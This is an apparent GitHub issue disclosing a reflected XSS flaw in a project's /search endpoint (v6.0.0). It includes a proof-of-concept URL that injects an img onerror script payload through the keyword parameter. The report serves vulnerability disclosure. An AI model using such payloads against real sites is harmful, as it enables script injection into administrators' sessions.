Reflected XSS - /search

# Summary

In the latest v6.0.0 version, the endpoint /search does not encode user-controllable parameters when outputting them on the current page, resulting in Reflected XSS. This allows attackers to launch XSS attacks against administrator users.

# POC

```
http://localhost:8888/search?keyword=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28%27search-XSS%27%29%3E
```

<img width="1040" height="181" alt="Image" src="https://github.com/user-attachments/assets/59c1137c-6819-4ca2-b8f2-1b7cff1be1d1" />

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Reflected XSS - /search #208

Summary

POC

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Reflected XSS - /search #208

Description

Summary

POC

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions